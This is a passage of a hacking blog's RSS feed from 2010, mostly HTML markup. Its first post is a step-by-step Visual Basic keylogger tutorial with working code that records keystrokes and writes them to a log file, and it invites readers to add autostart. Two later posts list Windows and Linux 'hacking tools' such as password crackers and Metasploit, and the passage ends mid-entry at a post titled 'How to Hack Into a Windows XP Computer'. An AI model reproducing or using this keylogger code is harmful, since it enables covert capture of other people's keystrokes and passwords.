If GAKS(65)&amp;lt;&amp;gt;0 will be comprehended by the VB compiler as “If the ‘A’ key is being pressed”.&lt;/span&gt;&lt;/span&gt;&lt;/div&gt;&lt;div style="color: #333333; font-family: Arial, Helvetica; font-size: 12px; line-height: 21px; margin-bottom: 15px; margin-left: 0px; margin-right: 0px; margin-top: 0px; padding-bottom: 0px; padding-left: 0px; padding-right: 0px; padding-top: 0px; text-align: justify;"&gt;Sticking all this stuff together, we can use this code to write a basic functional keylogger:&lt;/div&gt;&lt;div style="color: #333333; font-family: Arial, Helvetica; font-size: 12px; line-height: 21px; margin-bottom: 15px; margin-left: 0px; margin-right: 0px; margin-top: 0px; padding-bottom: 0px; padding-left: 0px; padding-right: 0px; padding-top: 0px; text-align: justify;"&gt;Private Sub tmrTimer_Timer()&lt;br /&gt;
Dim i As Integer&lt;br /&gt;
Static data As String&lt;br /&gt;
For i = 65 to 90 ‘represents ASCII codes from ‘A’ to ‘Z’&lt;br /&gt;
If GAKS(i)&amp;lt;&amp;gt;0 Then data = data &amp;amp; Chr(i)&lt;br /&gt;
Next i&lt;br /&gt;
If GAKS(32) &amp;lt;&amp;gt; 0 Then data = data &amp;amp; ” ” ‘checking for the space bar&lt;br /&gt;
If Len(data)&amp;gt;=100 Then&lt;br /&gt;
Msgbox “The last 100 (or a couple more) are these ” &amp;amp; VBNewLine &amp;amp; data&lt;br /&gt;
data = “”&lt;br /&gt;
End If&lt;br /&gt;
End Sub&lt;/div&gt;&lt;div style="color: #333333; font-family: Arial, Helvetica; font-size: 12px; line-height: 21px; margin-bottom: 15px; margin-left: 0px; margin-right: 0px; margin-top: 0px; padding-bottom: 0px; padding-left: 0px; padding-right: 0px; padding-top: 0px; text-align: justify;"&gt;This alone is enough to create a basic functioning keylogger although it is far from practical use. But this does the very essential function of keylogger. Do try it and modify it to your needs to see how GAKS works and how do the Timer delays affect the functionality of a keylogger. Honestly speaking, the core of our keylogger is complete, we have only to sharpen it now and make it precise, accurate and comprehensive.&lt;br /&gt;
The first problem that one encounters using GAKS is that this function is far too sensitive than required. Meaning that if we keep a key pressed for 1/10th of a second, this function will tell us that the key has been pressed for at least 2 times, while it actually was a sigle letter. For this, we must sharpen it. We need to add what I call “essential time count” to this function. This means that we need to tell it to generate a double key press only if the key has been pressed for a specified amount of time. For this, we need a whole array of counters. So open your eyes and listen attentively.&lt;/div&gt;&lt;div style="color: #333333; font-family: Arial, Helvetica; font-size: 12px; line-height: 21px; margin-bottom: 15px; margin-left: 0px; margin-right: 0px; margin-top: 0px; padding-bottom: 0px; padding-left: 0px; padding-right: 0px; padding-top: 0px; text-align: justify;"&gt;Dim count(0 to 255) As Integer&lt;br /&gt;
This array is required for remembering the time count for the keys. i.e. to remember for how long the key has been pressed.&lt;/div&gt;&lt;div style="color: #333333; font-family: Arial, Helvetica; font-size: 12px; line-height: 21px; margin-bottom: 15px; margin-left: 0px; margin-right: 0px; margin-top: 0px; padding-bottom: 0px; padding-left: 0px; padding-right: 0px; padding-top: 0px; text-align: justify;"&gt;Private Sub tmrTimer_Timer()&lt;br /&gt;
Dim i As Integer&lt;br /&gt;
Const timelimit As Integer = 10&lt;br /&gt;
Static data As String&lt;br /&gt;
For i=0 To 255 ‘for all the ASCII codes&lt;br /&gt;
If GAKS(i)&amp;lt;&amp;gt;0 Then&lt;br /&gt;
If count(i) = 0 Then ‘if the key has just been pressed&lt;br /&gt;
data = data &amp;amp; Chr(i)&lt;br /&gt;
ElseIf count(i) &amp;lt; timelimit Then&lt;br /&gt;
count(i) = count(i) + 1 ‘add 1 to the key count&lt;br /&gt;
Else&lt;br /&gt;
count(i) = 0 ‘initialize the count&lt;br /&gt;
data = data &amp;amp; Chr(i)&lt;br /&gt;
End If&lt;br /&gt;
Else ‘if the key is not being pressed&lt;br /&gt;
count(i) = 0&lt;br /&gt;
End If&lt;br /&gt;
Next i&lt;br /&gt;
End Sub&lt;/div&gt;&lt;div style="color: #333333; font-family: Arial, Helvetica; font-size: 12px; line-height: 21px; margin-bottom: 15px; margin-left: 0px; margin-right: 0px; margin-top: 0px; padding-bottom: 0px; padding-left: 0px; padding-right: 0px; padding-top: 0px; text-align: justify;"&gt;What we have done here is that we have set a time limit before the GAKS function will tell us that the key is being pressed. This means, in simple words, that if we press and hold the ‘A’ key, the GAKS function will not blindly tell us the ‘A’ key is being pressed, but it will wait for sometime before telling us again that the key is being pressed. This is a very important thing to do, because many users are not very fast typists and tend to press a key for somewhat longer than required.&lt;/div&gt;&lt;div style="color: #333333; font-family: Arial, Helvetica; font-size: 12px; line-height: 21px; margin-bottom: 15px; margin-left: 0px; margin-right: 0px; margin-top: 0px; padding-bottom: 0px; padding-left: 0px; padding-right: 0px; padding-top: 0px;"&gt;&lt;span style="font-family: arial, helvetica; margin-bottom: 0px; margin-left: 0px; margin-right: 0px; margin-top: 0px; padding-bottom: 0px; padding-left: 0px; padding-right: 0px; padding-top: 0px;"&gt;&lt;span class="edgeatext" style="margin-bottom: 0px; margin-left: 0px; margin-right: 0px; margin-top: 0px; padding-bottom: 0px; padding-left: 0px; padding-right: 0px; padding-top: 0px;"&gt;Now what is left (of the basic keylogger implementation) is just that we write the keys to a file. This should be very simple:&lt;/span&gt;&lt;/span&gt;&lt;/div&gt;&lt;div style="color: #333333; font-family: Arial, Helvetica; font-size: 12px; line-height: 21px; margin-bottom: 15px; margin-left: 0px; margin-right: 0px; margin-top: 0px; padding-bottom: 0px; padding-left: 0px; padding-right: 0px; padding-top: 0px; text-align: justify;"&gt;Private Sub timrTimer_Timer()&lt;br /&gt;
‘do all the fuss and listen for keystrokes&lt;br /&gt;
‘if a key press is detected&lt;br /&gt;
Open App.Path &amp;amp; “\logfile.txt” For Append As #1&lt;br /&gt;
Print #1, Chr(keycode);&lt;br /&gt;
Close #1&lt;br /&gt;
End Sub&lt;/div&gt;&lt;div style="color: #333333; font-family: Arial, Helvetica; font-size: 12px; line-height: 21px; margin-bottom: 15px; margin-left: 0px; margin-right: 0px; margin-top: 0px; padding-bottom: 0px; padding-left: 0px; padding-right: 0px; padding-top: 0px; text-align: justify;"&gt;Note that this is the very basic concept of writing a keylogger, we have yet not added autostart option and neither have we added an post-compile functionality edit options. These are advanced issues for the beginners. If you would like me to write about them, do tell me and I will write about them too, step by step. Please do comment on this article, telling me what it lacks and what was not required in it. Feel free to post this anywhere you like, just make sure you don’t use it for commercial purposes. If you have any questions about any part of it let me know and I will try to answer.&lt;/div&gt;</description><thr:total xmlns:thr="http://purl.org/syndication/thread/1.0">2</thr:total></item><item><title>Top 10 Windows Hacking Tools</title><link>http://0dl.blogspot.com/2010/11/top-10-windows-hacking-tools.html</link><category>HaCkINg</category><author>noreply@blogger.com (Unknown)</author><pubDate>Mon, 22 Nov 2010 11:55:00 +0530</pubDate><guid isPermaLink="false">tag:blogger.com,1999:blog-6412960892729447333.post-647123722716833793</guid><description>&lt;span class="Apple-style-span" style="color: #333333; font-family: Arial, Helvetica; font-size: 12px; line-height: 21px;"&gt;&lt;b&gt;This is the Collection of Best Windows Hacking Tools:&lt;/b&gt;&lt;/span&gt;&lt;br /&gt;
&lt;span class="Apple-style-span" style="color: #333333; font-family: Arial, Helvetica; font-size: 12px; line-height: 21px;"&gt;&lt;b&gt;&lt;br /&gt;
&lt;/b&gt;&lt;/span&gt;&lt;br /&gt;
&lt;div style="color: #333333; font-family: Arial, Helvetica; font-size: 12px; line-height: 21px; margin-bottom: 15px; margin-left: 0px; margin-right: 0px; margin-top: 0px; padding-bottom: 0px; padding-left: 0px; padding-right: 0px; padding-top: 0px; text-align: justify;"&gt;1.&amp;nbsp;&lt;a class="external" href="http://www.oxid.it/cain.html" rel="nofollow" style="color: #3c78a7; margin-bottom: 0px; margin-left: 0px; margin-right: 0px; margin-top: 0px; padding-bottom: 0px; padding-left: 0px; padding-right: 0px; padding-top: 0px; text-decoration: none;" target="_blank"&gt;&lt;span style="margin-bottom: 0px; margin-left: 0px; margin-right: 0px; margin-top: 0px; padding-bottom: 0px; padding-left: 0px; padding-right: 0px; padding-top: 0px;"&gt;Cain &amp;amp; Abel&lt;/span&gt;&lt;/a&gt;&amp;nbsp;– Cain &amp;amp; Abel is a password recovery tool for the Microsoft Windows Operating System. It allows easy recovery of various kind of passwords by sniffing the network, cracking encrypted passwords using Dictionary, Brute-Force and Cryptanalysis attacks, recording VoIP conversations, decoding scrambled passwords, revealing password boxes, uncovering cached passwords and analyzing routing protocols.&lt;/div&gt;&lt;div style="color: #333333; font-family: Arial, Helvetica; font-size: 12px; line-height: 21px; margin-bottom: 15px; margin-left: 0px; margin-right: 0px; margin-top: 0px; padding-bottom: 0px; padding-left: 0px; padding-right: 0px; padding-top: 0px; text-align: justify;"&gt;2.&amp;nbsp;&lt;a class="external" href="http://www.foundstone.com/index.htm?subnav=resources/navigation.htm&amp;amp;subcontent=/resources/proddesc/superscan.htm" rel="nofollow" style="color: #3c78a7; margin-bottom: 0px; margin-left: 0px; margin-right: 0px; margin-top: 0px; padding-bottom: 0px; padding-left: 0px; padding-right: 0px; padding-top: 0px; text-decoration: none;" target="_blank"&gt;&lt;span style="margin-bottom: 0px; margin-left: 0px; margin-right: 0px; margin-top: 0px; padding-bottom: 0px; padding-left: 0px; padding-right: 0px; padding-top: 0px;"&gt;SuperScan&lt;/span&gt;&lt;/a&gt;&amp;nbsp;– SuperScan is a powerful TCP port scanner, pinger, resolver. SuperScan 4 (Current Version) is a completely-rewritten update of the highly popular Windows port scanning tool, SuperScan.&lt;/div&gt;&lt;div style="color: #333333; font-family: Arial, Helvetica; font-size: 12px; line-height: 21px; margin-bottom: 15px; margin-left: 0px; margin-right: 0px; margin-top: 0px; padding-bottom: 0px; padding-left: 0px; padding-right: 0px; padding-top: 0px; text-align: justify;"&gt;3.&amp;nbsp;&lt;a class="external" href="http://www.gfi.com/adentry.asp?adv=814&amp;amp;loc=3" rel="nofollow" style="color: #3c78a7; margin-bottom: 0px; margin-left: 0px; margin-right: 0px; margin-top: 0px; padding-bottom: 0px; padding-left: 0px; padding-right: 0px; padding-top: 0px; text-decoration: none;" target="_blank"&gt;&lt;span style="margin-bottom: 0px; margin-left: 0px; margin-right: 0px; margin-top: 0px; padding-bottom: 0px; padding-left: 0px; padding-right: 0px; padding-top: 0px;"&gt;GFI LANguard Network Security Scanner&lt;/span&gt;&lt;/a&gt;&amp;nbsp;– GFI LANguard N.S.S. is a network vulnerability management solution that scans your network and performs over 15,000 vulnerability assessments. It identifies all possible security threats and provides you with tools to patch and secure your network. GFI LANguard N.S.S. was voted Favorite Commercial Security Tool by NMAP users for 2 years running and has been sold over 200,000 times!&lt;/div&gt;&lt;div style="color: #333333; font-family: Arial, Helvetica; font-size: 12px; line-height: 21px; margin-bottom: 15px; margin-left: 0px; margin-right: 0px; margin-top: 0px; padding-bottom: 0px; padding-left: 0px; padding-right: 0px; padding-top: 0px; text-align: justify;"&gt;4.&amp;nbsp;&lt;a class="external" href="http://www.eeye.com/html/Products/Retina/index.html" rel="nofollow" style="color: #3c78a7; margin-bottom: 0px; margin-left: 0px; margin-right: 0px; margin-top: 0px; padding-bottom: 0px; padding-left: 0px; padding-right: 0px; padding-top: 0px; text-decoration: none;" target="_blank"&gt;&lt;span style="margin-bottom: 0px; margin-left: 0px; margin-right: 0px; margin-top: 0px; padding-bottom: 0px; padding-left: 0px; padding-right: 0px; padding-top: 0px;"&gt;Retina&lt;/span&gt;&lt;/a&gt;&amp;nbsp;– Retina Network Security Scanner, recognised as the industry standard for vulnerability assessment, identifies known security vulnerabilities and assists in prioritising threats for remediation. Featuring fast, accurate, and non-intrusive scanning, users are able to secure their networks against even the most recent of discovered vulnerabilities.&lt;br /&gt;
&lt;a name='more'&gt;&lt;/a&gt;&lt;/div&gt;&lt;div style="color: #333333; font-family: Arial, Helvetica; font-size: 12px; line-height: 21px; margin-bottom: 15px; margin-left: 0px; margin-right: 0px; margin-top: 0px; padding-bottom: 0px; padding-left: 0px; padding-right: 0px; padding-top: 0px; text-align: justify;"&gt;5.&amp;nbsp;&lt;a class="external" href="http://www.samspade.org/ssw/" rel="nofollow" style="color: #3c78a7; margin-bottom: 0px; margin-left: 0px; margin-right: 0px; margin-top: 0px; padding-bottom: 0px; padding-left: 0px; padding-right: 0px; padding-top: 0px; text-decoration: none;" target="_blank"&gt;&lt;span style="margin-bottom: 0px; margin-left: 0px; margin-right: 0px; margin-top: 0px; padding-bottom: 0px; padding-left: 0px; padding-right: 0px; padding-top: 0px;"&gt;SamSpade&lt;/span&gt;&lt;/a&gt;&amp;nbsp;– SamSpade provides a consistent GUI and implementation for many handy network query tasks. It was designed with tracking down spammers in mind, but can be useful for many other network exploration, administration, and security tasks. It includes tools such as ping, nslookup, whois, dig, traceroute, finger, raw HTTP web browser, DNS zone transfer, SMTP relay check, website search, and more.&lt;/div&gt;&lt;div style="color: #333333; font-family: Arial, Helvetica; font-size: 12px; line-height: 21px; margin-bottom: 15px; margin-left: 0px; margin-right: 0px; margin-top: 0px; padding-bottom: 0px; padding-left: 0px; padding-right: 0px; padding-top: 0px; text-align: justify;"&gt;6.&amp;nbsp;&lt;a class="external" href="http://www.nstalker.com/nstealth/" rel="nofollow" style="color: #3c78a7; margin-bottom: 0px; margin-left: 0px; margin-right: 0px; margin-top: 0px; padding-bottom: 0px; padding-left: 0px; padding-right: 0px; padding-top: 0px; text-decoration: none;" target="_blank"&gt;&lt;span style="margin-bottom: 0px; margin-left: 0px; margin-right: 0px; margin-top: 0px; padding-bottom: 0px; padding-left: 0px; padding-right: 0px; padding-top: 0px;"&gt;N-Stealth&lt;/span&gt;&lt;/a&gt;&amp;nbsp;– N-Stealth is a commercial web server security scanner. It is generally updated more frequently than free web scanners such as whisker and nikto, but you have to pay for the privilege.&lt;/div&gt;&lt;div style="color: #333333; font-family: Arial, Helvetica; font-size: 12px; line-height: 21px; margin-bottom: 15px; margin-left: 0px; margin-right: 0px; margin-top: 0px; padding-bottom: 0px; padding-left: 0px; padding-right: 0px; padding-top: 0px; text-align: justify;"&gt;7.&amp;nbsp;&lt;a class="external" href="http://www.solarwinds.net/" rel="nofollow" style="color: #3c78a7; margin-bottom: 0px; margin-left: 0px; margin-right: 0px; margin-top: 0px; padding-bottom: 0px; padding-left: 0px; padding-right: 0px; padding-top: 0px; text-decoration: none;" target="_blank"&gt;&lt;span style="margin-bottom: 0px; margin-left: 0px; margin-right: 0px; margin-top: 0px; padding-bottom: 0px; padding-left: 0px; padding-right: 0px; padding-top: 0px;"&gt;Solarwinds&lt;/span&gt;&lt;/a&gt;&amp;nbsp;– Solarwinds contains many network monitoring, discovery and attack tools. The advanced security tools not only test internet security with the SNMP Brute Force Attack and Dictionary Attack utilities but also validate the security on Cisco Routers with the Router Security Check. The Remote TCP Reset remotely display all active sessions on a device and the Password Decryption can decrypt Type 7 Cisco Passwords. The Port Scanner allows testing for open TCP ports across IP Address and port ranges or selection of specific machines and ports.&lt;/div&gt;&lt;div style="color: #333333; font-family: Arial, Helvetica; font-size: 12px; line-height: 21px; margin-bottom: 15px; margin-left: 0px; margin-right: 0px; margin-top: 0px; padding-bottom: 0px; padding-left: 0px; padding-right: 0px; padding-top: 0px; text-align: justify;"&gt;8.&amp;nbsp;&lt;a class="external" href="http://www.mavensecurity.com/achilles/" rel="nofollow" style="color: #3c78a7; margin-bottom: 0px; margin-left: 0px; margin-right: 0px; margin-top: 0px; padding-bottom: 0px; padding-left: 0px; padding-right: 0px; padding-top: 0px; text-decoration: none;" target="_blank"&gt;&lt;span style="margin-bottom: 0px; margin-left: 0px; margin-right: 0px; margin-top: 0px; padding-bottom: 0px; padding-left: 0px; padding-right: 0px; padding-top: 0px;"&gt;Achilles&lt;/span&gt;&lt;/a&gt;&amp;nbsp;– The first publicly released general-purpose web application security assessment tool. Achilles acts as a HTTP/HTTPS proxy that allows a user to intercept, log, and modify web traffic on the fly. Due to a cyber squatter, Achilles is no longer online at its original home of www.Digizen-Security.com…OOPS!&lt;/div&gt;&lt;div style="color: #333333; font-family: Arial, Helvetica; font-size: 12px; line-height: 21px; margin-bottom: 15px; margin-left: 0px; margin-right: 0px; margin-top: 0px; padding-bottom: 0px; padding-left: 0px; padding-right: 0px; padding-top: 0px; text-align: justify;"&gt;9.&amp;nbsp;&lt;a class="external" href="http://foundstone.com/resources/proddesc/cookiedigger.htm" rel="nofollow" style="color: #3c78a7; margin-bottom: 0px; margin-left: 0px; margin-right: 0px; margin-top: 0px; padding-bottom: 0px; padding-left: 0px; padding-right: 0px; padding-top: 0px; text-decoration: none;" target="_blank"&gt;&lt;span style="margin-bottom: 0px; margin-left: 0px; margin-right: 0px; margin-top: 0px; padding-bottom: 0px; padding-left: 0px; padding-right: 0px; padding-top: 0px;"&gt;CookieDigger&amp;nbsp;&lt;/span&gt;&lt;/a&gt;- CookieDigger helps identify weak cookie generation and insecure implementations of session management by web applications. The tool works by collecting and analyzing cookies issued by a web application for multiple users. The tool reports on the predictability and entropy of the cookie and whether critical information, such as user name and password, are included in the cookie values.&lt;/div&gt;&lt;div style="color: #333333; font-family: Arial, Helvetica; font-size: 12px; line-height: 21px; margin-bottom: 15px; margin-left: 0px; margin-right: 0px; margin-top: 0px; padding-bottom: 0px; padding-left: 0px; padding-right: 0px; padding-top: 0px; text-align: justify;"&gt;10.&amp;nbsp;&lt;a class="external" href="http://www.atstake.com/research/tools/network_utilities/" rel="nofollow" style="color: #3c78a7; margin-bottom: 0px; margin-left: 0px; margin-right: 0px; margin-top: 0px; padding-bottom: 0px; padding-left: 0px; padding-right: 0px; padding-top: 0px; text-decoration: none;" target="_blank"&gt;&lt;span style="margin-bottom: 0px; margin-left: 0px; margin-right: 0px; margin-top: 0px; padding-bottom: 0px; padding-left: 0px; padding-right: 0px; padding-top: 0px;"&gt;Netcat (The Network SwissArmy Knife)&lt;/span&gt;&lt;/a&gt;&amp;nbsp;– Netcat was originally a Unix utility which reads and writes data across network connections, using TCP or UDP protocol. It is designed to be a reliable “back-end” tool that can be used directly or easily driven by other programs and scripts. At the same time, it is a feature-rich network debugging and exploration tool, since it can create almost any kind of connection you would need and has several interesting built-in capabilities.&lt;/div&gt;</description><thr:total xmlns:thr="http://purl.org/syndication/thread/1.0">0</thr:total></item><item><title>Top 10 Linux Hacking Tools</title><link>http://0dl.blogspot.com/2010/11/top-10-linux-hacking-tools.html</link><category>HaCkINg</category><author>noreply@blogger.com (Unknown)</author><pubDate>Mon, 22 Nov 2010 11:54:00 +0530</pubDate><guid isPermaLink="false">tag:blogger.com,1999:blog-6412960892729447333.post-803206633760682062</guid><description>&lt;span class="Apple-style-span" style="color: #333333; font-family: Arial, Helvetica; font-size: 12px; line-height: 21px;"&gt;&lt;b&gt;This is a Cool Collection of Top Ten Linux Hacking Tools.&lt;/b&gt;&lt;/span&gt;&lt;br /&gt;
&lt;span class="Apple-style-span" style="color: #333333; font-family: Arial, Helvetica; font-size: 12px; line-height: 21px;"&gt;&lt;b&gt;&lt;br /&gt;
&lt;/b&gt;&lt;/span&gt;&lt;br /&gt;
&lt;div style="color: #333333; font-family: Arial, Helvetica; font-size: 12px; line-height: 21px; margin-bottom: 15px; margin-left: 0px; margin-right: 0px; margin-top: 0px; padding-bottom: 0px; padding-left: 0px; padding-right: 0px; padding-top: 0px; text-align: justify;"&gt;1.&amp;nbsp;&lt;a class="external" href="http://www.insecure.org/nmap/" rel="nofollow" style="color: #3c78a7; margin-bottom: 0px; margin-left: 0px; margin-right: 0px; margin-top: 0px; padding-bottom: 0px; padding-left: 0px; padding-right: 0px; padding-top: 0px; text-decoration: none;" target="_blank"&gt;&lt;span style="margin-bottom: 0px; margin-left: 0px; margin-right: 0px; margin-top: 0px; padding-bottom: 0px; padding-left: 0px; padding-right: 0px; padding-top: 0px;"&gt;nmap&lt;/span&gt;&lt;/a&gt;&amp;nbsp;– Nmap (“Network Mapper”) is a free open source utility for network exploration or security auditing. It was designed to rapidly scan large networks, although it works fine against single hosts. Nmap uses raw IP packets in novel ways to determine what hosts are available on the network, what services (application name and version) those hosts are offering, what operating systems (and OS versions) they are running, what type of packet filters/firewalls are in use, and dozens of other characteristics. Nmap runs on most types of computers and both console and graphical versions are available.&lt;/div&gt;&lt;div style="color: #333333; font-family: Arial, Helvetica; font-size: 12px; line-height: 21px; margin-bottom: 15px; margin-left: 0px; margin-right: 0px; margin-top: 0px; padding-bottom: 0px; padding-left: 0px; padding-right: 0px; padding-top: 0px; text-align: justify;"&gt;2.&amp;nbsp;&lt;a class="external" href="http://www.cirt.net/code/nikto.shtml" rel="nofollow" style="color: #3c78a7; margin-bottom: 0px; margin-left: 0px; margin-right: 0px; margin-top: 0px; padding-bottom: 0px; padding-left: 0px; padding-right: 0px; padding-top: 0px; text-decoration: none;" target="_blank"&gt;&lt;span style="margin-bottom: 0px; margin-left: 0px; margin-right: 0px; margin-top: 0px; padding-bottom: 0px; padding-left: 0px; padding-right: 0px; padding-top: 0px;"&gt;Nikto&lt;/span&gt;&lt;/a&gt;&amp;nbsp;– Nikto is an Open Source (GPL) web server scanner which performs comprehensive tests against web servers for multiple items, including over 3200 potentially dangerous files/CGIs, versions on over 625 servers, and version specific problems on over 230 servers. Scan items and plugins are frequently updated and can be automatically updated (if desired).&lt;/div&gt;&lt;div style="color: #333333; font-family: Arial, Helvetica; font-size: 12px; line-height: 21px; margin-bottom: 15px; margin-left: 0px; margin-right: 0px; margin-top: 0px; padding-bottom: 0px; padding-left: 0px; padding-right: 0px; padding-top: 0px; text-align: justify;"&gt;3.&amp;nbsp;&lt;a class="external" href="http://thc.org/thc-amap/" rel="nofollow" style="color: #3c78a7; margin-bottom: 0px; margin-left: 0px; margin-right: 0px; margin-top: 0px; padding-bottom: 0px; padding-left: 0px; padding-right: 0px; padding-top: 0px; text-decoration: none;" target="_blank"&gt;&lt;span style="margin-bottom: 0px; margin-left: 0px; margin-right: 0px; margin-top: 0px; padding-bottom: 0px; padding-left: 0px; padding-right: 0px; padding-top: 0px;"&gt;THC-Amap&lt;/span&gt;&lt;/a&gt;&amp;nbsp;– Amap is a next-generation tool for assistingnetwork penetration testing. It performs fast and reliable application protocol detection, independant on the TCP/UDP port they are being bound to.&lt;br /&gt;
&lt;a name='more'&gt;&lt;/a&gt;&lt;/div&gt;&lt;div style="color: #333333; font-family: Arial, Helvetica; font-size: 12px; line-height: 21px; margin-bottom: 15px; margin-left: 0px; margin-right: 0px; margin-top: 0px; padding-bottom: 0px; padding-left: 0px; padding-right: 0px; padding-top: 0px; text-align: justify;"&gt;4.&amp;nbsp;&lt;a class="external" href="http://www.ethereal.com/" rel="nofollow" style="color: #3c78a7; margin-bottom: 0px; margin-left: 0px; margin-right: 0px; margin-top: 0px; padding-bottom: 0px; padding-left: 0px; padding-right: 0px; padding-top: 0px; text-decoration: none;" target="_blank"&gt;&lt;span style="margin-bottom: 0px; margin-left: 0px; margin-right: 0px; margin-top: 0px; padding-bottom: 0px; padding-left: 0px; padding-right: 0px; padding-top: 0px;"&gt;Ethereal&lt;/span&gt;&lt;/a&gt;&amp;nbsp;– Ethereal is used by network professionals around the world for troubleshooting, analysis, software and protocol development, and education. It has all of the standard features you would expect in a protocol analyzer, and several features not seen in any other product.&lt;/div&gt;&lt;div style="color: #333333; font-family: Arial, Helvetica; font-size: 12px; line-height: 21px; margin-bottom: 15px; margin-left: 0px; margin-right: 0px; margin-top: 0px; padding-bottom: 0px; padding-left: 0px; padding-right: 0px; padding-top: 0px; text-align: justify;"&gt;5.&amp;nbsp;&lt;a class="external" href="http://thc.org/thc-hydra/" rel="nofollow" style="color: #3c78a7; margin-bottom: 0px; margin-left: 0px; margin-right: 0px; margin-top: 0px; padding-bottom: 0px; padding-left: 0px; padding-right: 0px; padding-top: 0px; text-decoration: none;" target="_blank"&gt;&lt;span style="margin-bottom: 0px; margin-left: 0px; margin-right: 0px; margin-top: 0px; padding-bottom: 0px; padding-left: 0px; padding-right: 0px; padding-top: 0px;"&gt;THC-Hydra&lt;/span&gt;&lt;/a&gt;&amp;nbsp;– Number one of the biggest security holes are passwords, as every password security study shows. Hydra is a parallized login cracker which supports numerous protocols to attack. New modules are easy to add, beside that, it is flexible and very fast.&lt;/div&gt;&lt;div style="color: #333333; font-family: Arial, Helvetica; font-size: 12px; line-height: 21px; margin-bottom: 15px; margin-left: 0px; margin-right: 0px; margin-top: 0px; padding-bottom: 0px; padding-left: 0px; padding-right: 0px; padding-top: 0px; text-align: justify;"&gt;6.&amp;nbsp;&lt;a class="external" href="http://www.metasploit.com/projects/Framework/" rel="nofollow" style="color: #3c78a7; margin-bottom: 0px; margin-left: 0px; margin-right: 0px; margin-top: 0px; padding-bottom: 0px; padding-left: 0px; padding-right: 0px; padding-top: 0px; text-decoration: none;" target="_blank"&gt;&lt;span style="margin-bottom: 0px; margin-left: 0px; margin-right: 0px; margin-top: 0px; padding-bottom: 0px; padding-left: 0px; padding-right: 0px; padding-top: 0px;"&gt;Metasploit Framework&lt;/span&gt;&lt;/a&gt;&amp;nbsp;– The Metasploit Framework is an advanced open-source platform for developing, testing, and using exploit code. This project initially started off as a portable network game and has evolved into a powerful tool for penetration testing, exploit development, and vulnerability research.&lt;/div&gt;&lt;div style="color: #333333; font-family: Arial, Helvetica; font-size: 12px; line-height: 21px; margin-bottom: 15px; margin-left: 0px; margin-right: 0px; margin-top: 0px; padding-bottom: 0px; padding-left: 0px; padding-right: 0px; padding-top: 0px; text-align: justify;"&gt;7.&amp;nbsp;&lt;a class="external" href="http://www.openwall.com/john/" rel="nofollow" style="color: #3c78a7; margin-bottom: 0px; margin-left: 0px; margin-right: 0px; margin-top: 0px; padding-bottom: 0px; padding-left: 0px; padding-right: 0px; padding-top: 0px; text-decoration: none;" target="_blank"&gt;&lt;span style="margin-bottom: 0px; margin-left: 0px; margin-right: 0px; margin-top: 0px; padding-bottom: 0px; padding-left: 0px; padding-right: 0px; padding-top: 0px;"&gt;John the Ripper&lt;/span&gt;&lt;/a&gt;&amp;nbsp;– John the Ripper is a fast password cracker, currently available for many flavors of Unix (11 are officially supported, not counting different architectures), DOS, Win32, BeOS, and OpenVMS. Its primary purpose is to detect weak Unix passwords. Besides several crypt(3) password hash types most commonly found on various Unix flavors, supported out of the box are Kerberos AFS and Windows NT/2000/XP/2003 LM hashes, plus several more with contributed patches.&lt;/div&gt;&lt;div style="color: #333333; font-family: Arial, Helvetica; font-size: 12px; line-height: 21px; margin-bottom: 15px; margin-left: 0px; margin-right: 0px; margin-top: 0px; padding-bottom: 0px; padding-left: 0px; padding-right: 0px; padding-top: 0px; text-align: justify;"&gt;8.&amp;nbsp;&lt;a class="external" href="http://www.nessus.org/" rel="nofollow" style="color: #3c78a7; margin-bottom: 0px; margin-left: 0px; margin-right: 0px; margin-top: 0px; padding-bottom: 0px; padding-left: 0px; padding-right: 0px; padding-top: 0px; text-decoration: none;" target="_blank"&gt;&lt;span style="margin-bottom: 0px; margin-left: 0px; margin-right: 0px; margin-top: 0px; padding-bottom: 0px; padding-left: 0px; padding-right: 0px; padding-top: 0px;"&gt;Nessus&lt;/span&gt;&lt;/a&gt;&amp;nbsp;– Nessus is the world’s most popular vulnerability scanner used in over 75,000 organisations world-wide. Many of the world’s largest organisations are realising significant cost savings by using Nessus to audit business-critical enterprise devices and applications.&lt;/div&gt;&lt;div style="color: #333333; font-family: Arial, Helvetica; font-size: 12px; line-height: 21px; margin-bottom: 15px; margin-left: 0px; margin-right: 0px; margin-top: 0px; padding-bottom: 0px; padding-left: 0px; padding-right: 0px; padding-top: 0px; text-align: justify;"&gt;9.&amp;nbsp;&lt;a class="external" href="http://www.phenoelit.de/irpas/" rel="nofollow" style="color: #3c78a7; margin-bottom: 0px; margin-left: 0px; margin-right: 0px; margin-top: 0px; padding-bottom: 0px; padding-left: 0px; padding-right: 0px; padding-top: 0px; text-decoration: none;" target="_blank"&gt;&lt;span style="margin-bottom: 0px; margin-left: 0px; margin-right: 0px; margin-top: 0px; padding-bottom: 0px; padding-left: 0px; padding-right: 0px; padding-top: 0px;"&gt;IRPAS – Internetwork Routing Protocol Attack Suite&lt;/span&gt;&lt;/a&gt;&amp;nbsp;– Routing protocols are by definition protocols, which are used by routers to communicate with each other about ways to deliver routed protocols, such as IP. While many improvements have been done to the host security since the early days of the Internet, the core of this network still uses unauthenticated services for critical communication.&lt;/div&gt;&lt;div style="color: #333333; font-family: Arial, Helvetica; font-size: 12px; line-height: 21px; margin-bottom: 15px; margin-left: 0px; margin-right: 0px; margin-top: 0px; padding-bottom: 0px; padding-left: 0px; padding-right: 0px; padding-top: 0px; text-align: justify;"&gt;10.&amp;nbsp;&lt;a class="external" href="http://www.antsight.com/zsl/rainbowcrack/" rel="nofollow" style="color: #3c78a7; margin-bottom: 0px; margin-left: 0px; margin-right: 0px; margin-top: 0px; padding-bottom: 0px; padding-left: 0px; padding-right: 0px; padding-top: 0px; text-decoration: none;" target="_blank"&gt;&lt;span style="margin-bottom: 0px; margin-left: 0px; margin-right: 0px; margin-top: 0px; padding-bottom: 0px; padding-left: 0px; padding-right: 0px; padding-top: 0px;"&gt;Rainbowcrack&lt;/span&gt;&lt;/a&gt;&amp;nbsp;– RainbowCrack is a general propose implementation of Philippe Oechslin’s faster time-memory trade-off technique. In short, the RainbowCrack tool is a hash cracker. A traditional brute force cracker try all possible plaintexts one by one in cracking time. It is time consuming to break complex password in this way. The idea of time-memory trade-off is to do all cracking time computation in advance and store the result in files so called “rainbow table”.&lt;/div&gt;</description><thr:total xmlns:thr="http://purl.org/syndication/thread/1.0">0</thr:total></item><item><title>How to Hack Into a Windows XP Computer Without Changing Password</title><link>http://0dl.blogspot.com/2010/11/how-to-hack-into-windows-xp-computer.html</link><category>HaCkINg</category><author>noreply@blogger.com 